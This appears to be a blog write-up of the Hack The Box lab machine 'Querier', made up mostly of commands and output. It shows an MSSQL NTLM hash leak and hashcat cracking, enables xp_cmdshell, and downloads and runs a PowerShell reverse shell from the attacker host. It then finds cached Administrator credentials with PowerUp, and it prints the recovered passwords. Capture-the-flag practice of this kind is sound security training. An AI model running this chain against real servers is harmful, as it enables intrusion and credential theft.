Hack_The_Box_Writeups

HackTheBox – Querier

saksham dixit

If we open this file with LibreOffice for example, we will see the following warning. We can see those macros in Tools -> Macros -> Edit Macros.

root@kali:/home/kali# mssqlclient.py -windows-auth QUERIER/reporting:’PcwTWTHRwryjc$c6’@10.10.10.125

SQL> EXEC xp_cmdshell “whoami”

SQL> EXEC master.dbo.xp_dirtree ‘\\10.10.14.44\caca’;

Output: mssql-svc::QUERIER:9e51c633b81c9d7c:CF6FAD68C05BD1573BC621DB7764DF27:0101000000000000C0653150DE09D2018B9B9E34637AA2E6000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000006D0404BDD5AC85ACAAD036F2286C48FE53F058BCF53D964EC7A0F076F4A908D80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0034003400000000000000000000000000

root@kali:/home/kali# hashcat -m 5600 hash rockyou.txt –force

Output:

corporate568

root@kali:/home/kali# /home/kali/impacket/examples/mssqlclient.py -windows-auth mssql-svc:corporate568@10.10.10.125

SQL> EXEC xp_cmdshell ‘whoami’

SQL> EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;

SQL> EXEC xp_cmdshell ‘whoami’

SQL> EXEC xp_cmdshell ‘powershell -c “(New-Object System.Net.WebClient).DownloadFile(\”http://10.10.14.44:8080/Invoke-PowerShellTcp.ps1\”,\”C:\Users\mssql-svc\Desktop\caca.ps1\”)”‘

SQL> EXEC xp_cmdshell ‘powershell -ExecutionPolicy Bypass -File C:\Users\mssql-svc\Desktop\caca.ps1’

And on listener

root@kali:/home/kali# git clone https://github.com/PowerShellMafia/PowerSploit.git

Run Invoke-AllChecks to search for escalation vectors and we will see the Administrator credentials are cached in a Groups.xml file.

PS C:\windows\system32> Invoke-AllChecks

by this we get

Passwords : MyUnclesAreMarioAndLuigi!!1!

root@kali:/home/kali# psexec.py Administrator@10.10.10.125

Hi, I’m saksham dixit

Related Posts

Hack The Box – Spectra

──(root💀kali)-[/home/kali/Downloads] └─# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/...
saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *